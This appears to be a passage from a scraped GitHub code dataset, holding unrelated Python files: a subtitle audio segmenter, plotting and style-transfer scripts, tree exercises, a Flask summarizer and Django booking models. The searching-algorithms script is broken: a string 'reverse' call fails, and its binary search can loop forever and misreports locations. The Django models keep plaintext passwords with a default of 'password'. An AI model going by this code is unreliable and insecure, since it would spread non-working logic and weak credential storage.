curr_seg.to_string()\n\t\t\t\t\t# print(\"----====----\")\n\t\telse:\n\t\t\t#each subtitle entry is a segment\n\t\t\tif transcript and not transcript.isspace():\n\t\t\t\tcurr_seg = Segment()\n\t\t\t\tcurr_seg.start_time = start_time\n\t\t\t\tcurr_seg.end_time = end_time\n\t\t\t\tcurr_seg.transcript = transcript\n\t\t\t\tsegment_count += 1\n\t\t\t\tcurr_seg.id = 
segment_count\n\t\t\t\tcurr_seg.transcript = normalize_transcript(curr_seg.transcript)\n\t\t\t\tproscript.add_segment(curr_seg)\n\treturn proscript\n\ndef main(options):\n\tcheckArgument(options.audiofile, isFile=True)\n\tcheckArgument(options.subfile, isFile=True)\n\tcheckArgument(options.outdir, isDir=True, createDir=True)\n\n\tprint(\"Audio: %s\\nSubtitles: %s\\nLanguage: %s\"%(options.audiofile, options.subfile, options.file_prefix))\n\tprint(\"Reading subtitles...\", end=\"\")\n\tsrtData = pysrt.open(options.subfile)\n\tprint(\"done\")\n\n\taudio = AudioSegment.from_file(options.audiofile, format=options.audioformat)\n\n\tmovie_proscript = to_proscript(srtData)\n\n\tproscript_file = \"%s/%s_proscript.csv\"%(options.outdir, options.file_prefix)\n\tmovie_proscript.segments_to_csv(proscript_file, ['id', 'start_time', 'end_time', 'transcript'], delimiter='|')\n\tprint(\"Segments info written to %s\"%proscript_file)\n\n\tprint(\"Segmenting subtitle entries...\", end=\"\")\n\textract_audio_segments(movie_proscript, audio, options.outdir, file_prefix=options.file_prefix)\n\tprint(\"done.\")\n\t\n\nif __name__ == \"__main__\":\n usage = \"usage: %prog [-s infile] [option]\"\n parser = OptionParser(usage=usage)\n parser.add_option(\"-a\", \"--audiofile\", dest=\"audiofile\", default=None, help=\"movie audio file to be segmented\", type=\"string\")\n parser.add_option(\"-s\", \"--sub\", dest=\"subfile\", default=None, help=\"subtitle file (srt)\", type=\"string\")\n parser.add_option(\"-o\", \"--output-dir\", dest=\"outdir\", default=None, help=\"Directory to output segments and sentences\", type=\"string\")\n parser.add_option(\"-l\", \"--lang\", dest=\"movielang\", default=\"\", help=\"Language of the movie audio (Three letter ISO 639-2/T code)\", type=\"string\")\n parser.add_option(\"-p\", \"--prefix\", dest=\"file_prefix\", default=\"\", help=\"Prefix for naming files\", type=\"string\")\n parser.add_option(\"-f\", \"--audioformat\", dest=\"audioformat\", default=\"wav\", help=\"Audio format (wav, mp3 etc.)\", type=\"string\")\n parser.add_option(\"-m\", \"--merge-to-sentences\", dest=\"merge_to_sentences\", action=\"store_true\", default=False, help=\"Merges subtitle entries to full sentences. 
(Srt needs to be well punctuated)\")\n\n (options, args) = parser.parse_args()\n\n main(options)","repo_name":"collectivat/CorpusWorks","sub_path":"subsegment.py","file_name":"subsegment.py","file_ext":"py","file_size_in_byte":5914,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"13696243989","text":"from typing import List\n\nfrom svg.shapes import Line, Shape\nfrom svg.patterns.abstract import AbstractPattern\n\n\nclass GridPattern(AbstractPattern):\n @property\n def name(self) -> str:\n return \"grid\"\n\n @property\n def overridable(self) -> List[str]:\n return [\"stroke\"]\n\n def draw(self, count: int) -> List[Shape]:\n shapes = []\n\n parts_count = count + 1\n\n dx = self.width // parts_count\n dy = self.height // parts_count\n cc = self.palette.get_color()\n\n l = Line(dx, 0, dx, self.height)\n l.stroke = cc\n l.stroke_width = 2\n shapes.append(l)\n\n l = Line(0, dy, self.width, dy)\n l.stroke = cc\n l.stroke_width = 2\n shapes.append(l)\n\n return shapes\n\n\n__all__ = [\"GridPattern\"]\n","repo_name":"vikian050194/svg","sub_path":"svg/patterns/grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10735729412","text":"# https://leetcode.com/problems/flatten-binary-tree-to-linked-list/\n#\n# Given a binary tree, flatten it to a linked list in-place.\n#\n# For example,\n# Given\n#\n# 1\n# / \\\n# 2 5\n# / \\ \\\n# 3 4 6\n# The flattened tree should look like:\n# 1\n# \\\n# 2\n# \\\n# 3\n# \\\n# 4\n# \\\n# 5\n# \\\n# 6\n#\n# Hints:\n# If you notice carefully in the flattened tree,\n# each node's right child points to the next node of a pre-order traversal.\n\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def flatten(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: void Do not return anything, modify root in-place instead.\n \"\"\"\n if root == None:\n return\n stack = []\n if root.right != None:\n stack.append(root.right)\n if root.left != None:\n stack.append(root.left)\n linkedNode = root\n while stack != []:\n node = stack.pop()\n linkedNode.left = None\n linkedNode.right = node\n if node.right != None:\n stack.append(node.right)\n if node.left != None:\n stack.append(node.left)\n linkedNode = node\n return\n","repo_name":"rainzhop/cumulus-tank","sub_path":"leetcode/medium/flatten-binary-tree-to-linked-list.py","file_name":"flatten-binary-tree-to-linked-list.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71732932327","text":"from typing import Optional\n\nfrom bst_node import BstNode\nfrom test_framework import generic_test\n\n\ndef search_bst(tree: BstNode, key: int) -> Optional[BstNode]:\n ptr = tree\n while ptr is not None and ptr.data != key:\n if key < ptr.data:\n ptr = ptr.left\n else:\n ptr = ptr.right\n\n return ptr\n\ndef search_bst_wrapper(tree, key):\n result = search_bst(tree, key)\n return result.data if result else -1\n\n\nif __name__ == '__main__':\n exit(\n generic_test.generic_test_main('search_in_bst.py', 'search_in_bst.tsv',\n 
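Invocation of the subtitle segmenter above follows its OptionParser flags; a typical run that merges entries into whole sentences would be (file names are placeholders):

python subsegment.py -a movie_audio.wav -s movie_subs.srt -o out_segments -p movie1_ -f wav -m

which writes movie1__proscript.csv plus one movie1_NNNN_audio.wav / movie1_NNNN_sub.txt pair per segment into out_segments, per the "%s%04d" file-naming scheme in extract_audio_segments.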
search_bst_wrapper))\n","repo_name":"giuscri/new-epi-judge","sub_path":"epi_judge_python/search_in_bst.py","file_name":"search_in_bst.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41864888698","text":"'''https://cs111.wellesley.edu/labs/lab01/colors'''\n\nfrom turtle import Turtle, Screen\n\ntimmy = Turtle()\nprint(timmy)\ntimmy.shape(\"turtle\")\ntimmy.color(\"DeepPink\")\ntimmy.forward(220)\n\nmy_screen = Screen()\nprint(my_screen.canvheight)\nmy_screen.exitonclick()\n\n\n\n\nclass Car():\n \"\"\"atributes\"\"\"\n speed = 0\n fuel = 32\n\n \"\"\"method1\"\"\"\n def move(self):\n self.speed = 60\n\n\n \"\"\"method2\"\"\"\n def stop(self):\n self.speed = 0\n\nvolvo = Car()\nprint(volvo.speed)\nvolvo.move()\nprint(volvo.speed)\nvolvo.stop()\nprint(volvo.speed)","repo_name":"emillo89/nauka","sub_path":"100-days-of-code/2.Intermediate/Day16/145.ConstructingObject.py","file_name":"145.ConstructingObject.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"7568149974","text":"from flask import Flask,render_template,request\r\nimport pickle\r\napp=Flask(__name__)\r\nimport transformers\r\nfrom transformers import pipeline\r\nmod=pipeline(\"summarization\",model=\"facebook/bart-large-cnn\")\r\n@app.route('/')\r\ndef home():\r\n return render_template('front.html')\r\n@app.route(\"/summarize\",methods=['POST','GET'])\r\ndef predict():\r\n body=request.form['input1']\r\n result=mod(body)\r\n return render_template('summary.html',result=result)\r\nif __name__== '__main__':\r\n app.run(debug=True)","repo_name":"NEC-PROJECTS-2023/DG7","sub_path":"Code/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"14803160454","text":"from numpy import load, array\nimport matplotlib.pyplot as plt\nfrom matplotlib import rc\nimport os\n\n\nfolder = 'BIP_Experiment/SMC'\nload_data = lambda file_name: load(os.path.join(folder, file_name), allow_pickle=True)[()]\n# delta = 0.01\nRWM_001 = load_data('SMC_DICT_RWM_001.npy')\nTHUG_001 = load_data('SMC_DICT_THUG_001.npy')\nαTHUG_001 = load_data('SMC_DICT_ATHUG_001.npy')\n# delta = 0.1\nRWM_01 = load_data('SMC_DICT_RWM_01.npy')\nTHUG_01 = load_data('SMC_DICT_THUG_01.npy')\nαTHUG_01 = load_data('SMC_DICT_ATHUG_01.npy')\n# delta = 0.5\nRWM_05 = load_data('SMC_DICT_RWM_05.npy')\nTHUG_05 = load_data('SMC_DICT_THUG_05.npy')\nαTHUG_05 = load_data('SMC_DICT_ATHUG_05.npy')\n# delta = 1.0\nRWM_1 = load_data('SMC_DICT_RWM_1.npy')\nTHUG_1 = load_data('SMC_DICT_THUG_1.npy')\nαTHUG_1 = load_data('SMC_DICT_ATHUG_1.npy')\n\n\n\n\nif __name__ == \"__main__\":\n # Parameters\n LW = 3\n TICK_LABEL_SIZE=12\n LABEL_SIZE = 15\n TITLE_SIZE=20\n # Plot meta parameters\n n_rows = 4\n n_cols = 4\n # Storage\n D = array([\n [αTHUG_001, THUG_001, RWM_001, 0.01], \n [αTHUG_01, THUG_01, RWM_01, 0.1],\n [αTHUG_05, THUG_05, RWM_05, 0.5],\n [αTHUG_1, THUG_1, RWM_1, 1.0]])\n K = ['UNIQUE_PARTICLES', 'ALPHAS', 'ESS', 'AP']\n TITLES = [r'$\\mathregular{\\delta=0.01}$', r'$\\mathregular{\\delta=0.1}$', r'$\\mathregular{\\delta=0.5}$', r'$\\mathregular{\\delta=1.0}$']\n COLOR_THUG = '#354F60'\n COLOR_HUG = '#BC0E4C'\n COLOR_RWM = '#FFC501'\n fig, ax = plt.subplots(nrows=n_rows, ncols=n_cols, sharex=True, sharey='row', figsize=(16, 16))\n\n # Row 1 - Unique Particles\n 
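In the Flask summarizer above, mod(body) runs BART with default generation settings, and inputs longer than the model's 1024-token window will error out. The Hugging Face summarization pipeline accepts the usual generation arguments, so a tighter call could look like this (values are illustrative):

result = mod(
    body,
    max_length=130,   # cap on generated summary tokens
    min_length=30,    # avoid one-line summaries
    do_sample=False,  # deterministic output
    truncation=True,  # clip over-long inputs instead of raising
)
summary_text = result[0]['summary_text']  # the pipeline returns a list of dicts

Loading the pipeline at module import, as the script does, trades a slow process start-up for fast first requests.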
for j in range(n_cols):\n # αTHUG\n ax[0, j].plot(D[j, 0]['EPSILON'], D[j, 0]['UNIQUE_PARTICLES'], label=r'$\\alpha$THUG', lw=LW, color=COLOR_THUG)\n # THUG (α fixed)\n ax[0, j].plot(D[j, 1]['EPSILON'], D[j, 1]['UNIQUE_PARTICLES'], label=r'THUG', lw=LW, color=COLOR_HUG)\n # RWM\n ax[0, j].plot(D[j, 2]['EPSILON'], D[j, 2]['UNIQUE_PARTICLES'], label='RWM', lw=LW, color=COLOR_RWM)\n # Titles\n ax[0, j].set_title(TITLES[j], fontsize=TITLE_SIZE)\n ax[0, 0].set_ylabel(\"Unique Particles\", fontsize=LABEL_SIZE)\n\n\n # Row 2 - Alphas\n for j in range(n_cols):\n # αTHUG\n ax[1, j].plot(D[j, 0]['EPSILON'], D[j, 0]['ALPHAS'], label=r'$\\alpha$THUG', lw=LW, color=COLOR_THUG)\n ax[1, 0].set_ylabel(r\"$\\mathregular{\\alpha}$\", fontsize=LABEL_SIZE)\n\n # Row 3 - ESS\n for j in range(n_cols):\n # αTHUG\n ax[2, j].plot(D[j, 0]['EPSILON'], D[j, 0]['ESS'], label=r'$\\alpha$THUG', lw=LW, color=COLOR_THUG)\n # THUG (α fixed)\n ax[2, j].plot(D[j, 1]['EPSILON'], D[j, 1]['ESS'], label=r'THUG', lw=LW, color=COLOR_HUG)\n # RWM\n ax[2, j].plot(D[j, 2]['EPSILON'], D[j, 2]['ESS'], label='RWM', lw=LW, color=COLOR_RWM)\n ax[2, 0].set_ylabel('ESS', fontsize=LABEL_SIZE)\n\n # Row 4 - Acceptance Probability\n for j in range(n_cols):\n # αTHUG\n ax[3, j].plot(D[j, 0]['EPSILON'], D[j, 0]['AP'], label=r'$\\alpha$THUG', lw=LW, color=COLOR_THUG)\n # THUG (α fixed)\n ax[3, j].plot(D[j, 1]['EPSILON'], D[j, 1]['AP'], label=r'THUG', lw=LW, color=COLOR_HUG)\n # RWM\n ax[3, j].plot(D[j, 2]['EPSILON'], D[j, 2]['AP'], label='RWM', lw=LW, color=COLOR_RWM)\n ax[3, 0].set_ylabel('Acceptance Probability', fontsize=LABEL_SIZE)\n\n # Prettify\n for i in range(n_rows):\n for j in range(n_cols):\n if i == n_rows-1:\n ax[i, j].set_xlabel(r\"$\\mathregular{\\epsilon}$\", fontsize=20)\n ax[i, j].set_xscale('log')\n if i not in [0, 1, 2]:\n ax[i, j].set_yscale('log')\n ax[i, j].tick_params(axis='both', which='major', labelsize=TICK_LABEL_SIZE)\n plt.legend(fontsize=12, loc='lower right')\n plt.tight_layout()\n plt.savefig('images/smc_thug_fixedstepsize.png')\n plt.show()","repo_name":"MauroCE/ApproximateManifoldSamplingPaper","sub_path":"BIP_SMC_Plots.py","file_name":"BIP_SMC_Plots.py","file_ext":"py","file_size_in_byte":3881,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"40429921583","text":"def choice(arr, x):\n print(\"1.Linear Search\")\n print(\"2.Binary Search\")\n\n c = int(input(\"Enter your choice: \"))\n\n if c == 1:\n linearsearch(arr, x)\n elif c == 2:\n binarysearch(arr, x)\n else:\n print(\"Wrong Choice!\")\n choice(arr, x)\n\nt = \"\"\ny = t.reverse()\n\ndef linearsearch(arr, x):\n o = 0\n for i in range(len(arr)):\n if arr[i] == x:\n print(\"{0} is Found on {1} Location\".format(x, i))\n o += 1\n if o == 0:\n print(\"{0} is not Found in the List!\".format(x))\n\n\ndef binarysearch(arr, x):\n arr.sort()\n min = 0\n max = len(arr) - 1\n mid = (min + max) // 2\n\n while arr[mid] != x:\n if x == arr[mid]:\n break\n elif x > arr[mid]:\n min = mid\n mid = (min + max) // 2\n elif x < arr[mid]:\n max = mid\n mid = (min + max) // 2\n print(\"{0} is Found at {1} Location\".format(x, arr[mid]))\n\n\nMyList = list(map(int, input(\"\\nEnter the Numbers : \").strip().split()))\n\nnum = int(input(\"Enter the Number you want to Search: \"))\n\nchoice(MyList, 
num)\n","repo_name":"PrerakGada/Python-Programs","sub_path":"Searching-Algs.py","file_name":"Searching-Algs.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"66"} +{"seq_id":"4614782690","text":"from network import vggnet, transform\r\nimport tensorflow as tf\r\nfrom ops import content_loss, style_loss, gram\r\nfrom utils import random_batch, random_select_style\r\nfrom PIL import Image\r\nimport numpy as np\r\nimport scipy.misc as misc\r\n\r\n\r\ndef Train(IMG_H = 256, IMG_W = 256, IMG_C = 3, STYLE_H=512, STYLE_W=512, C_NUMS = 10, batch_size = 2, learning_rate = 0.001, content_weight = 1.0, style_weight = 5.0, path_content = \"./MSCOCO//\", path_style = \"./style_imgs//\", model_path=\"./save_para//\", vgg_path=\"./vgg_para//\"):\r\n content = tf.placeholder(tf.float32, [batch_size, IMG_H, IMG_W, IMG_C])\r\n style = tf.placeholder(tf.float32, [batch_size, STYLE_H, STYLE_W, IMG_C])\r\n y = tf.placeholder(tf.float32, [1, C_NUMS])\r\n y_ = tf.zeros([1, C_NUMS])\r\n alpha = tf.constant([1.])\r\n target = transform(content, y, y_, alpha)\r\n Phi_T = vggnet(target, vgg_path)\r\n Phi_C = vggnet(content, vgg_path)\r\n Phi_S = vggnet(style, vgg_path)\r\n Loss = content_loss(Phi_C, Phi_T) * content_weight + style_loss(Phi_S, Phi_T) * style_weight\r\n Style_loss = style_loss(Phi_S, Phi_T)\r\n Content_loss = content_loss(Phi_C, Phi_T)\r\n Opt = tf.train.AdamOptimizer(learning_rate).minimize(Loss)\r\n sess = tf.Session()\r\n sess.run(tf.global_variables_initializer())\r\n\r\n saver = tf.train.Saver()\r\n for itr in range(40000):\r\n batch_content= random_batch(path_content, batch_size, [IMG_H, IMG_W, IMG_C])\r\n batch_style, y_labels = random_select_style(path_style, batch_size, [STYLE_H, STYLE_W, IMG_C], C_NUMS)\r\n sess.run(Opt, feed_dict={content: batch_content, style: batch_style, y: y_labels})\r\n if itr % 50 == 0:\r\n [loss, Target, CONTENT_LOSS, STYLE_LOSS] = sess.run([Loss, target, Content_loss, Style_loss], feed_dict={content: batch_content, style: batch_style, y: y_labels})\r\n save_img = np.concatenate((batch_content[0, :, :, :], misc.imresize(batch_style[0, :, :, :], [IMG_H, IMG_W]), Target[0, :, :, :]), axis=1)\r\n print(\"Iteration: %d, Loss: %e, Content_loss: %e, Style_loss: %e\"%(itr, loss, CONTENT_LOSS, STYLE_LOSS))\r\n Image.fromarray(np.uint8(save_img)).save(\"./save_imgs//\"+str(itr) + \"_\" + str(np.argmax(y_labels[0, :]))+\".jpg\")\r\n if itr % 500 == 0:\r\n saver.save(sess, model_path+\"model.ckpt\")\r\n\r\ndef Init(c_nums = 10, model_path = \"./save_para//\"):\r\n content = tf.placeholder(tf.float32, [1, None, None, 3])\r\n y1 = tf.placeholder(tf.float32, [1, c_nums])\r\n y2 = tf.placeholder(tf.float32, [1, c_nums])\r\n alpha = tf.placeholder(tf.float32)\r\n target = transform(content, y1, y2, alpha)\r\n sess = tf.Session()\r\n sess.run(tf.global_variables_initializer())\r\n saver = tf.train.Saver()\r\n saver.restore(sess, model_path + \".\\\\model.ckpt\")\r\n return target, sess, content, y1, y2, alpha\r\n\r\ndef stylize(img_path,result_path, label1, label2, alpha, target, sess, content_ph, y1_ph, y2_ph, alpha_ph):\r\n img = np.array(Image.open(img_path))\r\n h = img.shape[0]\r\n w = img.shape[1]\r\n img = misc.imresize(img, [h//5, w//5])\r\n Y1 = np.zeros([1, 10])\r\n Y2 = np.zeros([1, 10])\r\n Y1[0, label1] = 1\r\n Y2[0, label2] = 1\r\n img = sess.run(target, feed_dict={content_ph: img[np.newaxis, :, :, :], y1_ph: Y1, y2_ph: Y2, alpha_ph: alpha})\r\n Image.fromarray(np.uint8(img[0, :, :, 
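The search demo just above has two bugs: the stray t = ""; y = t.reverse() pair raises AttributeError at import time (Python str has no reverse method, only list does), and binarysearch both loops forever when x is absent and prints the value arr[mid] where it claims a location. A corrected binary search with the same interface:

def binarysearch(arr, x):
    arr.sort()
    low, high = 0, len(arr) - 1
    while low <= high:
        mid = (low + high) // 2
        if arr[mid] == x:
            print("{0} is Found at {1} Location".format(x, mid))
            return mid
        elif x > arr[mid]:
            low = mid + 1   # discard the left half
        else:
            high = mid - 1  # discard the right half
    print("{0} is not Found in the List!".format(x))
    return -1

(The reported index refers to the list after the in-place sort, as in the original.)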
:])).save(result_path + \"result\"+str(alpha)+\".jpg\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n # Train()\r\n target, sess, content, y1, y2, alpha = Init()\r\n for alp in [0., 0.2, 0.4, 0.6, 0.8, 1.0]:\r\n stylize(\"C://Users//gmt//Desktop//content_dog.jpg\", \"./results//\", 4, 5, alp, target, sess, content, y1, y2, alpha)\r\n\r\n\r\n","repo_name":"MingtaoGuo/Chinese-Character-and-Calligraphic-Image-Processing","sub_path":"conditional_instance_norm_n_style_transfer/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3653,"program_lang":"python","lang":"en","doc_type":"code","stars":75,"dataset":"github-code","pt":"66"} +{"seq_id":"9609768374","text":"from django.db import models\nfrom django.db import connection, transaction\nimport datetime\nfrom admin_site.models import ReqData\nfrom datetime import datetime as dt\nimport random as rand\n\nclass Team(models.Model):\n\n\tteamID = models.CharField(max_length=100)\n\tteamPW = models.CharField(max_length=100, default='password')\n\tyearOfGrad = models.IntegerField(default=dt.now().year)\n\tstatus = models.IntegerField(default=0)\n\trequestMade = models.IntegerField(default=0)\n\tisStaff = models.IntegerField(default=0)\n\n\tdef __str__(self):\n\t\treturn self.teamID\n\t\n\tdef isLoggedIn(self):\n\t\tif self.status == 1:\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\t\n\tdef validate(self, password):\n\t\tretStatus = 0\n\t\t# retStatus {0:Invalid, 1:Valid and Single Instance, 2:Multiple Instance}\n\t\ttry:\n\t\t\tif (password == self.teamPW) & (self.status==1):\n\t\t\t\tretStatus=2\n\t\t\telif (password == self.teamPW) & (self.status==0):\n\t\t\t\tretStatus = 1\n\t\t\t\tself.status=1\n\t\t\t\tself.save()\n\t\texcept:\n\t\t\tretStatus=0\n\t\treturn retStatus\n\n\tdef logout(self):\n\t\tself.status=0\n\t\tself.save()\n\n\tdef madeRequest(self):\n\t\tself.requestMade=1\n\t\tself.save()\n\n\tdef populate(self):\n\t\tnumEntries = Request.objects.all().count()\n\t\tfor i in range(1, numEntries+1):\n\t\t\treq=Request.objects.get(pk=i)\n\t\t\tif i<10:\n\t\t\t\ttid = '202000'+str(i)\n\t\t\telif i<100:\n\t\t\t\ttid = '20200'+str(i)\n\t\t\telse:\n\t\t\t\ttid = '2020'+str(i)\n\t\t\tsLength=rand.choice([1,1.5,2,1,1.5,2,1,1.5,2,3])\n\t\t\tsWidth=rand.choice([1,1.5,2,1,1.5,2,1,1.5,2,3])\n\t\t\tsHeight=rand.choice([1,1.5,2,1,1.5,2,1,1.5,2,3])\n\t\t\tpLength=sLength-0.2\n\t\t\tpWidth=sWidth-0.2\n\t\t\tpHeight=sHeight-0.2\n\t\t\tprojectName='Capstone'+tid\n\t\t\tindustry=rand.choice(['Internet Security','Entrepreneurship','Mobile Application','Logistics','Robotics','Integrated Systems','Architecture','Defense'])\n\t\t\trepEmail=projectName+'@capstone.com'\n\t\t\tnumPP = rand.choice([1,2,3])\n\t\t\tnumBigPed = rand.choice([0,1])\n\t\t\tnumSmallPed = rand.choice([0,1,2])\n\t\t\tpedDesc = rand.choice([\n\t\t\t\t\t\t\t\t\t'TESTTESTTESTTESTTEST',\n\t\t\t\t\t\t\t\t\t'TESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTEST',\n\t\t\t\t\t\t\t\t\t'TESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTEST'\n\t\t\t\t\t\t\t\t\t])\n\t\t\tnumMonitor = rand.choice([0,1])\n\t\t\tnumTV = rand.choice([0,1])\n\t\t\tnumTable = rand.choice([0,1])\n\t\t\tnumChair = rand.choice([0,1,2])\n\t\t\tnumHDMI = numTV+numMonitor\n\t\t\tother = 
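The style-transfer script above leans on scipy.misc.imresize, which SciPy deprecated in 1.0 and removed in 1.3, so it only runs against old SciPy releases. Since Pillow is already imported there, a drop-in replacement is straightforward (a sketch; scipy.misc.imresize's extra mode/interp options are not reproduced):

import numpy as np
from PIL import Image

def imresize(arr, size):
    # size arrives as [height, width] at the call sites; PIL wants (width, height)
    h, w = size
    img = Image.fromarray(np.uint8(arr)).resize((w, h), Image.BILINEAR)
    return np.array(img)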
rand.choice([\n\t\t\t\t\t\t\t\t\t'TESTTESTTESTTESTTEST',\n\t\t\t\t\t\t\t\t\t'TESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTEST',\n\t\t\t\t\t\t\t\t\t'TESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTESTTEST'\n\t\t\t\t\t\t\t\t\t])\n\t\t\treqDateTime = dt.now()\n\n\t\t\tif (sLength==3 or sWidth==3 or sHeight==3):\n\t\t\t\tpType='1:1'\n\t\t\telse:\n\t\t\t\tpType=rand.choice(['1:1', 'Scaled Prototype', 'Software Prototype', 'Partial Prototype'])\n\t\t\tif industry == 'Internet Security' or industry == 'Mobile Application':\n\t\t\t\tpType = 'Software Prototype'\n\t\t\t\tsLength=1\n\t\t\t\tsWidth=1\n\t\t\t\tsHeight=1\n\t\t\t\tpLength=0.8\n\t\t\t\tpWidth=0.8\n\t\t\t\tpHeight=0.8\n\t\t\tif numBigPed+numSmallPed==0:\n\t\t\t\tpedDesc=''\n\n\t\t\treq.teamID=tid\n\t\t\treq.projectName=projectName\n\t\t\treq.repEmail=repEmail\n\t\t\treq.industry=industry\n\t\t\treq.pType=pType\n\t\t\treq.pLength=pLength\n\t\t\treq.pWidth=pWidth\n\t\t\treq.pHeight=pHeight\n\t\t\treq.sLength=sLength\n\t\t\treq.sWidth=sWidth\n\t\t\treq.sHeight=sHeight\n\t\t\treq.numPP=numPP\n\t\t\treq.numHDMI=numHDMI\n\t\t\treq.numBigPed=numBigPed\n\t\t\treq.numSmallPed=numSmallPed\n\t\t\treq.pedDesc=pedDesc\n\t\t\treq.numMonitor=numMonitor\n\t\t\treq.numTV=numTV\n\t\t\treq.numTable=numTable\n\t\t\treq.numChair=numChair\n\t\t\treq.other=other\n\t\t\treq.reqDateTime=reqDateTime\n\n\t\t\tprint(projectName)\n\t\t\treq.save()\n\n\nclass Request(models.Model):\n\tteamID = models.CharField(max_length=100)\n\tyearOfGrad = models.IntegerField(default=dt.now().year)\n\tprojectName = models.CharField(max_length=100, null=True)\n\tpType = models.CharField(max_length=100, null=True)\n\tindustry = models.CharField(max_length=100, null=True)\n\trepEmail = models.EmailField(null=True)\n\tpLength = models.FloatField(null=True)\n\tpWidth = models.FloatField(null=True)\n\tpHeight = models.FloatField(null=True)\n\tsLength = models.FloatField(null=True)\n\tsWidth = models.FloatField(null=True)\n\tsHeight = models.FloatField(null=True)\n\tnumPP = models.FloatField(null=True)\n\tnumBigPed = models.FloatField(null=True)\n\tnumSmallPed = models.FloatField(null=True)\n\tpedDesc = models.CharField(max_length=500, null=True)\n\tnumMonitor = models.FloatField(null=True)\n\tnumTV = models.FloatField(null=True)\n\tnumTable = models.FloatField(null=True)\n\tnumChair = models.FloatField(null=True)\n\tnumHDMI = models.FloatField(null=True)\n\tother = models.CharField(max_length=500, null=True)\n\treqDateTime = models.DateTimeField(null=True)\n\n\tdef __str__(self):\n\t\treturn self.teamID\n\n\tdef inputDetails(self, detailsDict):\n\t\tself.projectName = detailsDict['projectName']\n\t\tself.pType = detailsDict['prototypeType']\n\t\tself.industry = detailsDict['industry']\n\t\tself.repEmail = detailsDict['representativeEmail']\n\t\tself.pLength = detailsDict['prototypeLength']\n\t\tself.pWidth = detailsDict['prototypeWidth']\n\t\tself.pHeight = detailsDict['prototypeHeight']\n\t\tself.sLength = detailsDict['showcaseLength']\n\t\tself.sWidth = detailsDict['showcaseWidth']\n\t\tself.sHeight = detailsDict['showcaseHeight']\n\t\tself.numPP = detailsDict['powerpoints']\n\t\tself.numBigPed = detailsDict['bigPedestals']\n\t\tself.numSmallPed = detailsDict['smallPedestals']\n\t\tself.pedDesc 
= detailsDict['pedestalDescription']\n\t\tself.numMonitor = detailsDict['monitors']\n\t\tself.numTV = detailsDict['TVs']\n\t\tself.numTable = detailsDict['tables']\n\t\tself.numChair = detailsDict['chairs']\n\t\tself.numHDMI = detailsDict['HDMIAdaptors']\n\t\tself.other = detailsDict['others']\n\t\tself.reqDateTime = detailsDict['reqDateTime']\n\t\tself.save()\n\n\tdef injectToDB(self):\n\t\tinject = ReqData(\n\t\t\t\t\t\t\tteamID = self.teamID,\n\t\t\t\t\t\t\tprojectName = self.projectName,\n\t\t\t\t\t\t\tpType = self.pType,\n\t\t\t\t\t\t\tyearOfGrad = self.yearOfGrad,\n\t\t\t\t\t\t\tindustry = self.industry,\n\t\t\t\t\t\t\trepEmail = self.repEmail,\n\t\t\t\t\t\t\tpLength = self.pLength,\n\t\t\t\t\t\t\tpWidth = self.pWidth,\n\t\t\t\t\t\t\tpHeight = self.pHeight,\n\t\t\t\t\t\t\tsLength = self.sLength,\n\t\t\t\t\t\t\tsWidth = self.sWidth,\n\t\t\t\t\t\t\tsHeight = self.sHeight,\n\t\t\t\t\t\t\tnumPP = self.numPP,\n\t\t\t\t\t\t\tnumBigPed = self.numBigPed,\n\t\t\t\t\t\t\tnumSmallPed = self.numSmallPed,\n\t\t\t\t\t\t\tpedDesc = self.pedDesc,\n\t\t\t\t\t\t\tnumMonitor = self.numMonitor,\n\t\t\t\t\t\t\tnumTV = self.numTV,\n\t\t\t\t\t\t\tnumTable = self.numTable,\n\t\t\t\t\t\t\tnumChair = self.numChair,\n\t\t\t\t\t\t\tnumHDMI = self.numHDMI,\n\t\t\t\t\t\t\tother = self.other,\n\t\t\t\t\t\t\treqDateTime = 